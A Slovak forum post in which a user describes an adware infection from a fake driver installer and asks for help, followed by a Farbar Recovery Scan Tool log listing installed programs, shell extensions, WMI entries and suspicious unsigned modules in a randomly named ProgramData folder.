Prosím o pomoc, chcel som nainštalovať nejaké ovládače na video a namiesto ovladačov som si nainštaloval nejaku pliagu a začal sa brzdiť notebook a sám sa otváral Firefox a otvárali sa samé reklamné okná a tak. Rozhodol som sa že "odborne" zakročím tak som pustil ComboFix a aj to poriešilo niektoré veci no zostal ešte taký problém že keď mám pustený Firefox tak NB stále pracuje a prehrieva sa aj keď nič nerobím.
Vopred ďakujem
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 02-02-2020 02
Ran by Jomko (06-02-2020 21:29:55)
Running from C:\Users\Jomko\Desktop
Windows 7 Professional Service Pack 1 (X64) (2018-01-07 16:45:09)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-1214245489-2610092731-2950206201-500 - Administrator - Disabled)
Guest (S-1-5-21-1214245489-2610092731-2950206201-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1214245489-2610092731-2950206201-1002 - Limited - Enabled)
Jomko (S-1-5-21-1214245489-2610092731-2950206201-1000 - Administrator - Enabled) => C:\Users\Jomko
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-0011-0000-0000-0000000FF1CE}_PROPLUS_{BEE75E01-DD3F-4D5F-B96C-609E6538D419}) (Version: - Microsoft)
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-0015-041B-0000-0000000FF1CE}_PROPLUS_{B1A00287-698E-48D0-8C8F-A3387C2B8C45}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-0016-041B-0000-0000000FF1CE}_PROPLUS_{B1A00287-698E-48D0-8C8F-A3387C2B8C45}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-0018-041B-0000-0000000FF1CE}_PROPLUS_{B1A00287-698E-48D0-8C8F-A3387C2B8C45}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-0019-041B-0000-0000000FF1CE}_PROPLUS_{B1A00287-698E-48D0-8C8F-A3387C2B8C45}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-001A-041B-0000-0000000FF1CE}_PROPLUS_{B1A00287-698E-48D0-8C8F-A3387C2B8C45}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-001B-041B-0000-0000000FF1CE}_PROPLUS_{B1A00287-698E-48D0-8C8F-A3387C2B8C45}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-001F-0405-0000-0000000FF1CE}_PROPLUS_{3C3813E1-C370-4F32-9639-8B43C7C780CD}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-001F-0407-0000-0000000FF1CE}_PROPLUS_{2AB528A5-BB1B-4EBE-8E51-AD0C4CD33CA9}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-001F-0409-0000-0000000FF1CE}_PROPLUS_{3EC77D26-799B-4CD8-914F-C1565E796173}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-001F-040E-0000-0000000FF1CE}_PROPLUS_{685D17E5-D868-4A77-B58E-255DEBA78262}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-001F-041B-0000-0000000FF1CE}_PROPLUS_{F67648A4-713E-4298-BBAD-A83D8283B0F3}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-002A-0000-1000-0000000FF1CE}_PROPLUS_{00C5525B-3CB3-467D-8100-2E6FB306CD86}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-002A-041B-1000-0000000FF1CE}_PROPLUS_{FE295FA2-72FC-4859-85B3-0E6685DB13A4}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-0044-041B-0000-0000000FF1CE}_PROPLUS_{B1A00287-698E-48D0-8C8F-A3387C2B8C45}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-006E-041B-0000-0000000FF1CE}_PROPLUS_{FE295FA2-72FC-4859-85B3-0E6685DB13A4}) (Version: - Microsoft) Hidden
7-Zip 16.04 (x64) (HKLM\...\7-Zip) (Version: 16.04 - Igor Pavlov)
Adobe Acrobat Reader DC - Slovak (HKLM-x32\...\{AC76BA86-7AD7-1051-7B44-AC0F074E4100}) (Version: 19.021.20061 - Adobe Systems Incorporated)
Adobe Flash Player 32 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 32.0.0.321 - Adobe)
Aktualizácie NVIDIA 2.13.0.21 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update) (Version: 2.13.0.21 - NVIDIA Corporation)
ANT Drivers Installer x64 (HKLM\...\{C14C3A1D-B5B3-41BB-9358-6FEA3FC642AF}) (Version: 2.3.4 - Garmin Ltd or its subsidiaries) Hidden
AOMEI Partition Assistant Standard Edition 6.6 (HKLM-x32\...\{02F850ED-FD0E-4ED1-BE0B-54981f5BD3D4}_is1) (Version: - AOMEI Technology Co., Ltd.)
Apple Mobile Device Support (HKLM\...\{6CECF0FB-EE71-4FE5-8AE0-FA007408934A}) (Version: 13.0.0.38 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{A30EA700-5515-48F0-88B0-9E99DC356B88}) (Version: 2.6.0.1 - Apple Inc.)
Ashampoo PDF Pro (HKLM-x32\...\{0A11EA01-9906-0D0E-7868-3381FE134510}_is1) (Version: 1.0.7 - Ashampoo GmbH & Co. KG)
Bitvise SSH Client - FlowSshNet (x64) (HKLM\...\{0F4F44AB-C022-466B-9836-8EB4344E481F}) (Version: 8.38.0.0 - Bitvise Limited) Hidden
Bitvise SSH Client - FlowSshNet (x86) (HKLM-x32\...\{F9932D09-05BF-4FB8-B748-094EC2B3FC1F}) (Version: 8.38.0.0 - Bitvise Limited) Hidden
Bitvise SSH Client 8.38 (remove only) (HKLM-x32\...\BvSshClient) (Version: 8.38 - Bitvise Limited)
Bluetooth Win7 Suite (64) (HKLM\...\{230D1595-57DA-4933-8C4E-375797EBB7E1}) (Version: 7.4.0.96 - Meno vašej spoločnosti)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
CloudNet (HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\...\CloudNet) (Version: 20170301 - EpicNet Inc.) <==== ATTENTION
Elevated Installer (HKLM-x32\...\{B11981DA-5AEA-459F-978A-F99541F77AD5}) (Version: 6.15.0.0 - Garmin Ltd or its subsidiaries) Hidden
FileZilla Client 3.46.3 (HKLM-x32\...\FileZilla Client) (Version: 3.46.3 - Tim Kosse)
Free FLAC to MP3 Converter 1.4 (HKLM-x32\...\{A54C01BD-1277-4722-B42B-EC9800A90B1E}_is1) (Version: 1.4 - PolySoft Solutions)
Free ZIP Password Recovery (HKLM-x32\...\{AF4ED478-C15D-4D4D-95E4-70C15F963729}) (Version: 3.70.69 - KRyLack Software)
Garmin Express (HKLM-x32\...\{4cc2749e-1c2a-4f48-abdf-c17069bac4da}) (Version: 6.15.0.0 - Garmin Ltd or its subsidiaries)
Garmin Express (HKLM-x32\...\{9BE7B09F-C8D2-4B1E-B83E-7387FDDA8BCD}) (Version: 6.15.0.0 - Garmin Ltd or its subsidiaries) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 79.0.3945.130 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.35.441 - Google LLC) Hidden
Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.21.169 - Google Inc.) Hidden
Hard Disk Low Level Format Tool 4.40 (HKLM-x32\...\Hard Disk Low Level Format Tool_is1) (Version: - HDDGURU)
HP Dropbox Plugin (HKLM-x32\...\{9646F2DC-B09E-4314-92EC-B3332900A7EE}) (Version: 36.0.191.0 - HP)
HP EmailSMTP Plugin (HKLM-x32\...\{AF9F1F16-F6B4-4A66-B789-9F00B40B08AF}) (Version: 43.0.191.0 - HP)
HP FTP Plugin (HKLM-x32\...\{7DB5EDF6-8009-4E01-AF0D-4F3E02A0287F}) (Version: 43.0.191.0 - HP)
HP Google Drive Plugin (HKLM-x32\...\{07F30E12-A85F-4EA4-A5B3-3728FAB947ED}) (Version: 36.0.191.0 - HP)
HP LaserJet MFP M28-M31 Basic Device Software (HKLM\...\{08644094-D714-4B6E-9CEB-11433F5CBDB7}) (Version: 46.2.2636.18185 - HP Inc.)
HP LaserJet MFP M28-M31 Help (HKLM-x32\...\{0DF6621D-67C2-4E12-A5CF-260E985B8743}) (Version: 0.00.0005 - HP)
HP OneDrive Plugin (HKLM-x32\...\{8ED0A60F-9F44-4B7F-9C88-CC9E0B362628}) (Version: 36.0.191.0 - HP)
HP SFTP Plugin (HKLM-x32\...\{1F0191BF-E339-4192-85D9-C369CA3FE9F1}) (Version: 43.0.191.0 - HP)
HP SharePoint Plugin (HKLM-x32\...\{96DB7179-0B69-45E1-A109-3A3A1F5BBCDF}) (Version: 43.0.191.0 - HP)
I.R.I.S OCR (HKLM-x32\...\{3913CCF7-436B-4A7A-A265-62E9FFDD03D9}) (Version: 15.2.10.1114 - HP Inc.)
iCloud (HKLM\...\{28ABC5D7-AF47-4476-A6AA-C2DD822ED40F}) (Version: 7.9.0.9 - Apple Inc.)
ID3 Tag Editor (HKLM-x32\...\{671DC096-9262-4943-A3D8-ED8A757B60D5}_is1) (Version: - id3tageditor.com)
Inside (HKLM-x32\...\{9BD4503F-F711-491D-984A-AB4ABD66B8C2}_is1) (Version: - Playdead)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.14.5067 - Intel Corporation)
Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 2.0.0.102 - Intel Corporation)
Intel(R) Wireless Bluetooth(R) (HKLM\...\{00000070-0190-4FD1-8F3D-148929CC1385}) (Version: 19.70.0 - Intel Corporation)
Intel® PROSet/Wireless Software (HKLM-x32\...\{6da487a6-c50d-494e-aaa0-6d8ce9c37ef3}) (Version: 20.10.2 - Intel Corporation)
IrfanView (remove only) (HKLM-x32\...\IrfanView) (Version: 4.42 - Irfan Skiljan)
iRoot (HKLM-x32\...\{1295E43F-382A-4CB2-9E0F-079C0D7401BB}_is1) (Version: 1.8.9.21144 - SING)
iTunes (HKLM\...\{8F087FFD-35AC-4707-8565-58E5619CBF18}) (Version: 12.10.0.7 - Apple Inc.)
Java 8 Update 241 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180241F0}) (Version: 8.0.2410.7 - Oracle Corporation)
JDownloader 2 (HKLM-x32\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
Kodi (HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\...\Kodi) (Version: - XBMC Foundation)
Logitech Options (HKLM\...\LogiOptions) (Version: 8.10.84 - Logitech)
Master PDF Editor 3.6 (HKLM\...\Master PDF Editor 3_is1) (Version: 3.6.30 - Code Industry Ltd.)
Microsoft .NET Framework 4.8 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.8.03761 - Microsoft Corporation)
Microsoft Office Professional Plus 2007 (HKLM-x32\...\PROPLUS) (Version: 12.0.6215.1000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.16.27012 (HKLM-x32\...\{427ada59-85e7-4bc8-b8d5-ebf59db60423}) (Version: 14.16.27012.6 - Microsoft Corporation)
Miro Video Converter (HKLM-x32\...\Miro Video Converter) (Version: 0.8.0 - Participatory Culture Foundation)
Mozilla Firefox 72.0.2 (x64 sk) (HKLM\...\Mozilla Firefox 72.0.2 (x64 sk)) (Version: 72.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 57.0.4 - Mozilla)
MPC-HC 1.7.13 (64-bit) (HKLM\...\{2ACBF1FA-F5C3-4B19-A774-B22A31F231B9}_is1) (Version: 1.7.13 - MPC-HC Team)
NeoDownloader 2.9.5 (HKLM-x32\...\{E76CDDCE-EFC0-4FE5-9972-9489CE49AA55}_is1) (Version: 2.9.5 - Neowise Software)
NVIDIA Grafický ovládač 419.72 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 419.72 - NVIDIA Corporation)
NVIDIA Softvér systému s podporou technológie PhysX 9.16.0318 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.16.0318 - NVIDIA Corporation)
OpenOffice 4.1.5 (HKLM-x32\...\{E177AC33-EC9C-4537-8996-37ED331D9227}) (Version: 4.15.9789 - Apache Software Foundation)
Ovládací panel NVIDIA 419.72 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.ControlPanel) (Version: 419.72 - NVIDIA Corporation) Hidden
Podpora Apple aplikácií (32-bit) (HKLM-x32\...\{FD52A2FF-4D16-49C4-A2CD-DAC752C18BA2}) (Version: 8.0 - Apple Inc.)
Podpora Apple aplikácií(64-bit) (HKLM\...\{9B061D60-4E2C-4987-BFFD-423E3D477660}) (Version: 8.0 - Apple Inc.)
Product Improvement Study for HP LaserJet MFP M28-M31 (HKLM\...\{B50C256D-80E2-473E-9546-0410162F44D5}) (Version: 46.2.2636.18185 - HP Inc.)
PSPad editor (HKLM-x32\...\PSPad editor_is1) (Version: 4.6.2.2750 - Jan Fiala)
qTox (HKLM-x32\...\qTox) (Version: 1.13.0 - The qTox Project)
SAMSUNG USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.3.1500.0 - SAMSUNG Electronics Co., Ltd.)
SoftEther VPN Client (HKLM\...\softether_sevpnclient) (Version: 4.29.9680 - SoftEther VPN Project)
SpeedFan (remove only) (HKLM-x32\...\SpeedFan) (Version: - )
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 17.0.10.51 - Synaptics Incorporated)
Total Commander 64-bit (Remove or Repair) (HKLM\...\Totalcmd64) (Version: 9.0 - Ghisler Software GmbH)
VLC media player (HKLM\...\VLC media player) (Version: 3.0.8 - VideoLAN)
Win32DiskImager version 1.0.0 (HKLM-x32\...\{3DFFA293-DF2C-4B23-92E5-3433BDC310E1}}_is1) (Version: 1.0.0 - ImageWriter Developers)
WinCDEmu (HKLM-x32\...\WinCDEmu) (Version: 4.1 - Sysprogs)
Windows Driver Package - Dynastream Innovations, Inc. ANT LibUSB Drivers (04/11/2012 1.2.40.201) (HKLM\...\F9D2A789F9CFF8CEC36B544F53877C80F1F73C46) (Version: 04/11/2012 1.2.40.201 - Dynastream Innovations, Inc.)
Windows Driver Package - Silicon Labs Software (DSI_SiUSBXp_3_1) USB (02/06/2007 3.1) (HKLM\...\D1506E0025B5A3F9EB8270FE81C1EEDD9388B8A2) (Version: 02/06/2007 3.1 - Silicon Labs Software)
WinRAR 5.50 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.50.0 - win.rar GmbH)
XnView 2.39 (HKLM-x32\...\XnView_is1) (Version: 2.39 - Gougelet Pierre-e)
==================== Custom CLSID (Whitelisted): ==============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
CustomCLSID: HKU\S-1-5-21-1214245489-2610092731-2950206201-1000_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\Windows\system32\igfxEM.exe (Intel Corporation -> Intel Corporation)
CustomCLSID: HKU\S-1-5-21-1214245489-2610092731-2950206201-1000_Classes\CLSID\{ED90173A-3B4C-4E7E-B9CF-79714425D4B5}\InprocServer32 -> C:\Program Files (x86)\PSPad editor\pspshellx64.dll () [File not signed]
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers1: [Atheros] -> {B8952421-0E55-400B-94A6-FA858FC0A39F} => C:\Program Files (x86)\Bluetooth Suite\BtvAppExt.dll [2011-09-16] (Atheros Communications Inc. -> Atheros Commnucations) [File not signed]
ContextMenuHandlers1: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> No File
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers1: [PhotoStreamsExt] -> {89D984B3-813B-406A-8298-118AFA3A22AE} => C:\Program Files\Common Files\Apple\Internet Services\ShellStreams64.dll [2018-12-03] (Apple Inc. -> Apple Inc.)
ContextMenuHandlers1: [WinCDEmu] -> {D0E37FD2-F675-426F-B09A-2CF37BA46FD5} => C:\Program Files (x86)\WinCDEmu\x64\WinCDEmuContextMenu.dll [2015-09-28] (Sysprogs OU) [File not signed]
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2017-08-11] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2017-08-11] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1: [WondershareVideoConverterFileOpreation] -> {FEB746CA-95C2-485F-B386-C30D4E56D22E} => C:\Windows\SysWOW64\WSCM64.dll -> No File
ContextMenuHandlers2: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> No File
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers2: [WinCDEmu] -> {A9901FCD-B4DF-43A1-BD5D-6C9F88679497} => C:\Program Files (x86)\WinCDEmu\x64\WinCDEmuContextMenu.dll [2015-09-28] (Sysprogs OU) [File not signed]
ContextMenuHandlers3: [FTShellContext] -> {AFF81F7B-6942-40c4-AADA-7214EF7B6DD1} => C:\Program Files (x86)\Bluetooth Suite\ShellContextExt.dll [2011-09-16] (Atheros Communications Inc. -> Atheros Commnucations) [File not signed]
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\Windows\system32\igfxDTCM.dll [2019-07-12] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2019-03-18] (NVIDIA Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers6: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> No File
ContextMenuHandlers6: [WinCDEmu] -> {A9901FCD-B4DF-43A1-BD5D-6C9F88679497} => C:\Program Files (x86)\WinCDEmu\x64\WinCDEmuContextMenu.dll [2015-09-28] (Sysprogs OU) [File not signed]
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2017-08-11] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2017-08-11] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1_S-1-5-21-1214245489-2610092731-2950206201-1000: [EditWithPSPad] -> {ED90173A-3B4C-4E7E-B9CF-79714425D4B5} => C:\Program Files (x86)\PSPad editor\pspshellx64.dll [2014-11-02] () [File not signed]
==================== Codecs (Whitelisted) ====================
==================== Shortcuts & WMI ========================
(The entries could be listed to be restored or removed.)
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]
==================== Loaded Modules (Whitelisted) =============
2018-01-08 18:39 - 2014-11-02 18:45 - 000029184 _____ () [File not signed] C:\Program Files (x86)\PSPad editor\pspshellx64.dll
2019-10-21 13:56 - 2019-10-21 13:56 - 000144896 _____ () [File not signed] C:\ProgramData\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ent\laclient\libssh2.dll
2019-10-21 13:56 - 2019-10-21 13:56 - 000077824 _____ () [File not signed] C:\ProgramData\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ent\laclient\zlib.dll
2011-09-16 14:52 - 2011-09-16 14:52 - 000053920 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\AthCopyHook.dll
2011-09-16 14:53 - 2011-09-16 14:53 - 000020128 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\athr_debug.dll
2011-09-16 14:54 - 2011-09-16 14:54 - 000040608 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\BPP.DLL
2011-09-16 14:55 - 2011-09-16 14:55 - 000045216 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\BTBIP.DLL
2011-09-16 14:55 - 2011-09-16 14:55 - 000161440 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\BtvAppExt.dll
2011-09-16 15:02 - 2011-09-16 15:02 - 000504480 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\filetransfer.dll
2011-09-16 15:02 - 2011-09-16 15:02 - 000092832 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\gatts.DLL
2011-09-16 15:03 - 2011-09-16 15:03 - 000106144 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\GOEP.DLL
2011-09-16 15:03 - 2011-09-16 15:03 - 000080032 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\Handsfree.dll
2011-09-16 15:04 - 2011-09-16 15:04 - 000093856 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\L2capLib.dll
2011-09-16 15:06 - 2011-09-16 15:06 - 000310432 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\ObjPush.dll
2011-09-16 15:06 - 2011-09-16 15:06 - 004974752 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\OutLookLib.dll
2011-09-16 15:07 - 2011-09-16 15:07 - 000073888 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\PhoneBook.DLL
2011-09-16 15:07 - 2011-09-16 15:07 - 000065184 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\RfcommLib.dll
2011-09-16 15:08 - 2011-09-16 15:08 - 000109216 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\sesmgr.dll
2011-09-16 15:08 - 2011-09-16 15:08 - 000284320 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\ShellContextExt.dll
2011-09-16 15:08 - 2011-09-16 15:08 - 000041632 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\sim.DLL
2011-09-16 15:08 - 2011-09-16 15:08 - 000129184 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\skypeagent.dll
2011-09-16 15:09 - 2011-09-16 15:09 - 000061088 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\Sync.dll
2011-09-16 15:09 - 2011-09-16 15:09 - 000030368 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\utils.DLL
2018-02-15 20:11 - 2016-03-21 23:15 - 000027648 _____ (Copyright (c) Code Industry Ltd ) [File not signed] C:\Windows\System32\mpelocalmon.dll
2018-01-09 21:13 - 2016-10-04 15:51 - 000076800 _____ (Igor Pavlov) [File not signed] C:\Program Files\7-Zip\7-zip.dll
2018-01-11 15:12 - 2013-04-11 11:10 - 000073728 _____ (Intel Corporation) [File not signed] C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.dll
2019-04-02 17:10 - 2015-02-27 09:35 - 000489984 _____ (Newtonsoft) [File not signed] C:\Program Files (x86)\Wondershare\WAF\2.4.2.223\Newtonsoft.Json.dll
2017-02-12 01:28 - 2015-09-28 19:08 - 000255488 _____ (Sysprogs OU) [File not signed] C:\Program Files (x86)\WinCDEmu\x64\WinCDEmuContextMenu.dll
2019-10-21 13:56 - 2019-10-21 13:56 - 000355840 _____ (The cURL library, hxxp://curl.haxx.se/) [File not signed] C:\ProgramData\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ent\laclient\LIBCURL.dll
